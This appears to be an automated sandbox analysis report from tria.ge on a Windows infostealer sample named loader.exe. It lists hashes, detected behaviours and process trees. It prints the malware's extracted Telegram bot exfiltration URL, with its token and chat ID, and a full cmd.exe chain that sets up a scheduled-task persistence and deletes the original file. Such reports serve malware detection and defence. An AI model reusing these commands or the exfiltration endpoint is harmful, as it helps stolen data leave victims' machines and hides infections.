Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/04/2024, 02:58
240410-dgn9kacd46 1010/04/2024, 02:58
240410-dgnm2aff7x 1010/04/2024, 02:58
240410-dgnb9sff7w 1010/04/2024, 02:58
240410-dgm2haff7v 1023/08/2023, 14:58
230823-sb7laaed41 10Analysis
-
max time kernel
9s -
max time network
12s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
10/04/2024, 02:58
Behavioral task
behavioral1
Sample
loader.exe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
loader.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
loader.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
loader.exe
Resource
win11-20240221-en
General
-
Target
loader.exe
-
Size
401KB
-
MD5
69e3cdc923b668aec4cb405c040565c6
-
SHA1
6a675ebf6f241e543f7bb50ccc8ead462a427880
-
SHA256
8d647fd3ebb00c9d853eb728ff7cba75b7a089d30f84090e3bc1dc460bdd47f3
-
SHA512
5580919f6710fc210f079875eae22a87c85e854b57f59d10fc22680460f370154d7d223a66c9797387e4675a7954ba6f051a34571499481927980eb9ebf07cdb
-
SSDEEP
6144:+CGmWI/2hvRn6Ie646G0D1eBlxy9bAmI6:+KWI/8B6Q9b5eBlxnmI6
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6193093056:AAHzyNGUGS9aUG6CCx6ENLoXpCFLzEQywIQ/sendMessage?chat_id=1098292643
Signatures
-
Deletes itself 1 IoCs
pid Process 3056 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2520 loader.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2512 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2516 PING.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2188 loader.exe Token: SeDebugPrivilege 2520 loader.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2188 wrote to memory of 3056 2188 loader.exe 28 PID 2188 wrote to memory of 3056 2188 loader.exe 28 PID 2188 wrote to memory of 3056 2188 loader.exe 28 PID 3056 wrote to memory of 2324 3056 cmd.exe 30 PID 3056 wrote to memory of 2324 3056 cmd.exe 30 PID 3056 wrote to memory of 2324 3056 cmd.exe 30 PID 3056 wrote to memory of 2516 3056 cmd.exe 31 PID 3056 wrote to memory of 2516 3056 cmd.exe 31 PID 3056 wrote to memory of 2516 3056 cmd.exe 31 PID 3056 wrote to memory of 2512 3056 cmd.exe 32 PID 3056 wrote to memory of 2512 3056 cmd.exe 32 PID 3056 wrote to memory of 2512 3056 cmd.exe 32 PID 3056 wrote to memory of 2520 3056 cmd.exe 33 PID 3056 wrote to memory of 2520 3056 cmd.exe 33 PID 3056 wrote to memory of 2520 3056 cmd.exe 33 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "loader" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\loader.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\loader.exe" &&START "" "C:\Users\Admin\AppData\Local\TeamViewer\loader.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2516
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "loader" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\TeamViewer\loader.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2512
-
-
C:\Users\Admin\AppData\Local\TeamViewer\loader.exe"C:\Users\Admin\AppData\Local\TeamViewer\loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
401KB
MD569e3cdc923b668aec4cb405c040565c6
SHA16a675ebf6f241e543f7bb50ccc8ead462a427880
SHA2568d647fd3ebb00c9d853eb728ff7cba75b7a089d30f84090e3bc1dc460bdd47f3
SHA5125580919f6710fc210f079875eae22a87c85e854b57f59d10fc22680460f370154d7d223a66c9797387e4675a7954ba6f051a34571499481927980eb9ebf07cdb